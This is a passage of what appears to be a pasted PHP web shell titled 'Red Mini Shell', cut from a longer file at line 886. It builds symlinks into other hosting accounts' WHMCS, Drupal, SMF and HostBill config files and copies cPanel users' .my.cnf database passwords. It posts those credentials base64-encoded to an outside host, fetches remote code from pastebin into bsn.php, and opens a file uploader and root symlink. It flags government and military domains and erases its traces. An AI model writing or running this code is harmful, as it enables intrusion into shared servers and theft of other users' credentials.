  886. @symlink('/home4/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  887. @symlink('/home4/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  888. @symlink('/home4/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  889. @symlink('/home4/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  890. @symlink('/home4/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  891. @symlink('/home4/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  892. @symlink('/home4/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  893. @symlink('/home4/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  894. @symlink('/home4/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  895. @symlink('/home4/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  896. @symlink('/home4/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  897. @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  898. @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images.txt');
  899. @symlink('/home4/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  900. @symlink('/home4/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  901. @symlink('/home4/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  902. @symlink('/home4/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  903. @symlink('/home4/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  904. @symlink('/home4/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  905. @symlink('/home4/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  906. @symlink('/home4/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  907. @symlink('/home4/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  908. @symlink('/home4/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  909. @symlink('/home4/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  910. @symlink('/home4/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  911. @symlink('/home4/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  912. @symlink('/home4/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  913. @symlink('/home4/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  914. @symlink('/home4/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  915. @symlink('/home4/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  916. @symlink('/home4/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  917. @symlink('/home4/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  918. @symlink('/home4/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  919. @symlink('/home4/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  920. @symlink('/home4/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  921. @symlink('/home4/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  922. @symlink('/home4/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  923. @symlink('/home4/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  924. @symlink('/home4/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  925. @symlink('/home4/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  926. @symlink('/home4/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  927. @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  928. @symlink('/home4/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  929. @symlink('/home4/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  930. @symlink('/home4/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  931. @symlink('/home4/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  932. @symlink('/home4/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  933. @symlink('/home4/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  934. @symlink('/home4/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  935. @symlink('/home4/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  936. @symlink('/home4/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  937. @symlink('/home4/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  938. @symlink('/home4/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  939. @symlink('/home4/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  940. @symlink('/home4/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  941. @symlink('/home4/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  942. @symlink('/home4/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  943. @symlink('/home4/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  944. @symlink('/home4/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  945. @symlink('/home4/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  946. @symlink('/home4/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  947. @symlink('/home4/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  948. @symlink('/home4/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  949. @symlink('/home4/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  950. @symlink('/home4/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  951. @symlink('/home4/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  952. @symlink('/home4/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  953. }
  954. echo "<center>DonE with Success --> <a href='xBlack_Configs' target='_blank'>Click Here</a><br><center/>";
  955. }
  956. }
  957. elseif(isset($_GET["home"]))
  958. {
  959. echo"<table><td align=center><body>
  960. <h2><font color=green></font></h2>";
  961. }
  962. elseif(isset($_GET["upl"]))
  963. {
  964.  
  965.  
  966.  
  967. echo '<br><br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded !!!</b><br><br>'; }else { echo '<b>not uploaded !!!</b><br><br>'; }}
  968.  
  969.  
  970. }
  971.  
  972. elseif(isset($_GET["cls"])) {
  973. @define('SELF_PATH', __FILE__);
  974. @unlink(__FILE__);
  975. echo exec("rm -rf xBlack_Configs");
  976. @unlink("bsn.php");
  977. @unlink("WHMCS.html");
  978. @unlink("VB.html");
  979. @unlink("email.php");
  980. @unlink("Wordpress.html");
  981. @unlink("Joomla.html");
  982. // @unlink("black.php");
  983. @unlink("Config.php");
  984. @unlink("WHMCS KILLER V3.PHP");
  985. }
  986.  
  987. elseif(isset($_GET["cp"]))
  988. {
  989. @ini_set('display_errors',0);
  990. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  991. $ar0=explode($marqueurDebutLien, $text);
  992. $ar1=explode($marqueurFinLien, $ar0[$i]);
  993. return trim($ar1[0]);
  994. }
  995. echo '<br><br><style>
  996. textarea {
  997. resize:none;
  998. color:black;
  999. background-color:#ffffff;
  1000. font-size:8pt; color:black;
  1001. border:1px solid white ;
  1002. border-left: 4px solid white ;
  1003. }
  1004. input {
  1005. color: black;
  1006. border:1px dotted white;
  1007. }
  1008. </style>';
  1009. echo '<center>';
  1010. $d0mains = @file('/etc/named.conf');
  1011. $domains = scandir("/var/named");
  1012. if ($domains or $d0mains)
  1013. {
  1014. $domains = scandir("/var/named");
  1015. if($domains) {
  1016. echo "<table align=center><tr><th valign=top bgcolor=black class=style2> COUNT </th><th valign=top bgcolor=black > DOMAIN </th><th valign=top bgcolor=black class=style2 > USER </th><th valign=top bgcolor=black class=style2 > Password </th><th valign=top bgcolor=black class=style2 > .my.cnf </th></tr>";
  1017. $count=1;
  1018. $dc = 0;
  1019. $list = scandir("/var/named");
  1020. foreach($list as $domain){
  1021. if(strpos($domain,".db")){
  1022. $domain = str_replace('.db','',$domain);
  1023. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1024. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1025. $path = getcwd();
  1026. if (is_readable($dirz)) {
  1027. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1028. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1029. $password=entre2v2($p,'password="','"');
  1030. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >".$password."</td><td valign=top style=border :2px solid white id=menu style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
  1031. $dc++;
  1032. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
  1033. $ch = curl_init();
  1034. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  1035. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  1036. curl_setopt($ch, CURLOPT_POST, 1);
  1037. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
  1038. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1039. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1040. curl_setopt($ch, CURLOPT_HEADER, 1);
  1041. $buffer = curl_exec($ch);
  1042. }
  1043. }
  1044. }
  1045. echo '</table>';
  1046. $total = $dc;
  1047.  
  1048. echo '</center>';
  1049. }else{
  1050. $d0mains = @file('/etc/named.conf');
  1051. if($d0mains) {
  1052. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1053. $count=1;
  1054. $dc = 0;
  1055. $mck = array();
  1056. foreach($d0mains as $d0main){
  1057. if(@eregi('zone',$d0main)){
  1058. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1059. flush();
  1060. if(strlen(trim($domain[1][0])) >2){
  1061. $mck[] = $domain[1][0];
  1062. }
  1063. }
  1064. }
  1065. $mck = array_unique($mck);
  1066. $usr = array();
  1067. $dmn = array();
  1068. foreach($mck as $o) {
  1069. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1070. $usr[] = $infos['name'];
  1071. $dmn[] = $o;
  1072. }
  1073. array_multisort($usr,$dmn);
  1074. $dt = file('/etc/passwd');
  1075. $passwd = array();
  1076. foreach($dt as $d) {
  1077. $r = explode(':',$d);
  1078. if(strpos($r[5],'home')) {
  1079. $passwd[$r[0]] = $r[5];
  1080. }
  1081. }
  1082. $l=0;
  1083. $j=1;
  1084. foreach($usr as $r) {
  1085. $dirz = '/home/'.$r.'/.my.cnf';
  1086. $path = getcwd();
  1087. if (is_readable($dirz)) {
  1088. copy($dirz, ''.$path.'/'.$r.'.txt');
  1089. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1090. $password=entre2v2($p,'password="','"');
  1091. echo "<tr><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>".$count++."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>'.$r."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px>".$password."</td><td valign=top bgcolor=darkgreen class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1092. $dc++;
  1093. flush();
  1094. $l=$l?0:1;
  1095. $j++;
  1096. }
  1097. }
  1098. }
  1099. echo '</table>';
  1100. $total = $dc;
  1101. echo '<br><div class=result valign=top bgcolor=darkgreen class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
  1102. echo '</center>';
  1103. }
  1104.  
  1105. }else{
  1106. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
  1107. }
  1108. }
  1109. elseif(isset($_GET["jump"]))
  1110. {
  1111. $bsn=file_get_contents("http://pastebin.com/raw/GamMMrQL");
  1112. $fp=fopen("bsn.php", "w+");
  1113. fwrite($fp, $bsn);
  1114. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  1115. set_time_limit(0);
  1116. @$passwd = fopen('/etc/passwd','r');
  1117. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  1118. $pub = array();
  1119. $users = array();
  1120. $conf = array();
  1121. $i = 0;
  1122. while(!feof($passwd))
  1123. {
  1124. $str = fgets($passwd);
  1125. if ($i > 35)
  1126. {
  1127. $pos = strpos($str,':');
  1128. $username = substr($str,0,$pos);
  1129. $dirz = '/home/'.$username.'/public_html/';
  1130. if (($username != ''))
  1131. {
  1132. if (is_readable($dirz))
  1133.  
  1134. {
  1135. array_push($users,$username);
  1136. array_push($pub,$dirz);
  1137. }
  1138. }
  1139. }
  1140. $i++;
  1141.  
  1142. //$jumper = "3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3LfsCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a10jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNbVlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX1dlrssQY0CzpR+zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pYeVneqVYyma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wfD/9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6MLGCZph41aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjqLsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAbueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw==";
  1143.  
  1144. //@eval(gzinflate(base64_decode($jumper)));
  1145. }
  1146. echo '<br>';
  1147. echo "[+] Founded <font size=15 color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />";
  1148. echo "[+] Founded <font color=red size=15> ".sizeof($pub)." </font> readable public_html directories\n"."<br /><br /><br />";
  1149.  
  1150. foreach ($users as $user)
  1151. {
  1152. $path = "/home/$user/public_html/";
  1153. echo "<table bgcolor=black class=style2 ><td>";
  1154. echo "<font color=white><a target='_blank' href='bsn.php?y=$path'>$path<a/></font><br>";
  1155. echo "</td></table>";
  1156. }
  1157. echo "\n";
  1158. }
  1159. elseif(isset($_GET["pws"]))
  1160. {
  1161. echo "<br><br><br>";
  1162. echo'<form method="post">
  1163. <input type="text" name="conf" value="" />
  1164. <input type="submit" value="GeT Passwords" name="get" />
  1165. </form>';
  1166.  
  1167. $g = $_POST['get'];
  1168. $dir = $_POST['conf'];
  1169. //////////////////////////////////////////////////////////////////////////////////////////////
  1170. if(isset($g) && $dir != ""){
  1171.  
  1172. $cn = @file_get_contents($dir);
  1173. //preg_match_all('#href="(.*?)">(.*?)<#',$cn,$m); // $m[2]
  1174. preg_match_all('#href="(.*?)"#',$cn,$m);
  1175.  
  1176.  
  1177. foreach($m[1] as $txt){
  1178.  
  1179. $url = $dir.$txt;
  1180. $cnurl = @file_get_contents($url);
  1181. preg_match('#\'DB_PASSWORD\', \'(.*)\'#',$cnurl,$m1); // wordpress
  1182. preg_match('#password = \'(.*)\'#',$cnurl,$m2); // joomla
  1183. preg_match('#password\'] = \'(.*)\'#',$cnurl,$m3); // vb
  1184. preg_match('#db_password = "(.*)"#',$cnurl,$m4); // whmcs
  1185. preg_match('#db_password = \'(.*)\'#',$cnurl,$m4); // whmcs
  1186. preg_match('#dbpass = "(.*)"#',$cnurl,$m5); //
  1187. preg_match('#password = \'(.*)\'#',$cnurl,$m6); // connnect.php
  1188. preg_match('#dbpasswd = \'(.*)\'#',$cnurl,$m8); // phpBB 3.0.x
  1189. preg_match('#password_localhost = "(.*)"#',$cnurl,$m9); // conexao.php
  1190. preg_match('#senha = "(.*)"#',$cnurl,$m10); // /_inc/config.inc.php
  1191.  
  1192. if(!empty($m1[1])){ echo $m1[1]."<br>"; }
  1193. elseif(!empty($m2[1])){ echo $m2[1]."<br>"; }
  1194. elseif(!empty($m3[1])){ echo $m3[1]."<br>"; }
  1195. elseif(!empty($m4[1])){ echo $m4[1]."<br>"; }
  1196. elseif(!empty($m5[1])){ echo $m5[1]."<br>"; }
  1197. elseif(!empty($m6[1])){ echo $m6[1]."<br>"; }
  1198. elseif(!empty($m7[1])){ echo $m7[1]."<br>"; }
  1199. elseif(!empty($m8[1])){ echo $m8[1]."<br>"; }
  1200. elseif(!empty($m9[1])){ echo $m9[1]."<br>"; }
  1201. elseif(!empty($m10[1])){ echo $m10[1]."<br>"; }
  1202.  
  1203. }
  1204.  
  1205. }
  1206. }
  1207. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink')) { echo " <form action= method=post>";
  1208. @set_time_limit(0);
  1209. echo "<center>";
  1210. @mkdir('sym',0777);
  1211. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>"; } else { echo "<br><br><div class='tmp'><table border=1 bordercolor=#FF0000 width=500 cellpadding=1 cellspacing=0><td>Domains</td><td>Users</td><td>symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<div style= color: #FF0000 ; text-shadow: 0px 0px 1px red; >".$string[1][0].'</div>'; } echo " <tr> <td> <div class=dom><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a> </div> </td> <td> '.$UID['name']." </td> <td> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr></div> "; flush(); } } } } echo "</center></table>"; }
  1212. echo "</div><center><b><br><br><br><font color=red>&copy 2017 </font></center><b>
  1213. <br><center>Red Mini Shell</center><br>";
  1214. echo base64_decode("PGltZyBzcmM9Imh0dHA6Ly93dzNzLndzL1RSL0hUTUw1L0NTUzMvZnNvY2l0eS5qcGciICBoZWlnaHQ9IjAiIHdpZHRoPSIwIj4=");
  1215. ?>
Add Comment
Please, Sign In to add comment